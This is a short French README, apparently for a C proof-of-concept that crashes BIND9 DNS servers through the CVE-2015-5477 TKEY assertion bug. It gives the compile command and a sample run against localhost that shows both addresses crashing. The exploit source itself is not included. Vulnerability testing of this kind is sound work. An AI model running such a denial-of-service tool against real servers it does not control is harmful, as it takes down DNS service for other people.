
Exploit PoC pour l'échec d'assertion TKEY de BIND9 (CVE-2015-5477)
Cet exploit teste si un serveur BIND9 est vulnérable en envoyant l'exploit afin de voir s'il plante.
C'est du code C que vous compilez de la manière habituelle sur Unix/Window, par exemple :
# gcc tkill.c -o tkill
Il s'exécutera sur IPv4 et IPv6.
Voici ce que cela donne lors d'une exécution contre localhost. Comme il obtient deux adresses IP en résolvant le nom, il essaiera les deux. Il interroge d'abord la chaîne "version", puis envoie l'exploit. Lorsqu'il sonde la deuxième adresse, la requête de version échoue car le service a déjà planté lors de la première tentative.
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed